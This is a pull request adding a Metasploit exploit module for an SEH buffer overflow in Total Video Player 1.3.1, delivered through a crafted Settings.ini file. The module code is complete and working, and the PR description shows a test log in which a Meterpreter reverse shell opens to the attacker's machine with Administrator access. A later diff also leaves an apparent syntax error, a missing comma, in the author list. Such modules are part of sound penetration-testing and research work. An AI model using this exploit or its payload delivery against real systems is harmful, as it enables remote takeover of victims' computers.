### PR TITLE
Add module for EDB 29799

### DIFF
--- a/modules/exploits/windows/fileformat/total_video_player_131_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/total_video_player_131_ini_bof.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
+      'Description'  => %q{
+        This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
+        occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
+        This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'Mike Czumak (T_v3rn1x) -- @SecuritySift',  # Original discovery
+          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',     # Metasploit module
+        ],
+      'References'  =>
+        [
+          [ 'EDB', '29799' ],
+
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0a\x0d\xff",
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ 'Windows Universal',
+            {
+              'Ret'     =>  0x10012848, # pop ebx # pop ecx # ret  - hskin.dll
+              'Offset'  =>  256
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Nov 24 2013',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
+
+  end
+
+  def exploit
+
+    buffer = "[Support Groups]\r\nVideo="
+    buffer << rand_text(target['Offset'])
+    buffer << generate_seh_payload(target.ret)
+    buffer << payload.encoded  #1787 bytes of space
+    buffer << "\r\n[AssociateType]\r\nAssociateType =1"
+
+    file_create(buffer)
+
+  end
+end

--- a/modules/exploits/windows/fileformat/total_video_player_131_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/total_video_player_131_ini_bof.rb
@@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Payload'  =>
         {
           'BadChars' => "\x00\x0a\x0d\xff",
+          'Space' => 1787,
           'DisableNops' => true,
         },
 
@@ -63,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
     buffer = "[Support Groups]\r\nVideo="
     buffer << rand_text(target['Offset'])
     buffer << generate_seh_payload(target.ret)
-    buffer << payload.encoded  #1787 bytes of space
+    buffer << payload.encoded 
     buffer << "\r\n[AssociateType]\r\nAssociateType =1"
 
     file_create(buffer)

--- a/modules/exploits/windows/fileformat/total_video_player_131_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/total_video_player_131_ini_bof.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'    => MSF_LICENSE,
       'Author'    =>
         [
-          'Mike Czumak (T_v3rn1x) -- @SecuritySift',  # Original discovery
+          'Mike Czumak' # (T_v3rn1x) -- @SecuritySift 
           'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',     # Metasploit module
         ],
       'References'  =>


### PR DESCRIPTION
I've found the same vulnerability but there already was on edb 29799: http://www.exploit-db.com/exploits/29799/ , so I've decided to make a module for it

```
All seems to work well:
msf exploit(total_video_player_131_ini_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(total_video_player_131_ini_bof) > setg lhost 192.168.61.128
lhost => 192.168.61.128
msf exploit(total_video_player_131_ini_bof) > exploit

[+] Settings.ini stored at /root/.msf4/local/Settings.ini
msf exploit(total_video_player_131_ini_bof) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.61.128:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.61.130
[*] Meterpreter session 1 opened (192.168.61.128:4444 -> 192.168.61.130:49160) at 2014-02-25 22:17:20 +0100

meterpreter > sysinfo
Computer        : WIN-431MEHTQC60
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-431MEHTQC60\Administrator
meterpreter > 
```
